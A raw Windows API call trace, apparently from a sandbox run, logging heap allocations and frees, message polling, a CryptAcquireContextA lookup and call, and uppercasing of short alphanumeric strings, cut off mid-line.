[0256.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0256.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0256.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.105] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0256.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0256.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0256.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.105] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0256.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0256.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.106] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2698) returned 1 [0256.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.109] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.109] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.109] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0256.109] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.110] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0256.110] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.110] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.110] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.110] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.110] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.110] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.110] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.110] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.111] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.111] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.111] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.111] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.111] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.111] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0256.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.113] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0256.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.113] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0256.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.114] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.114] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.114] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.114] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.114] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: 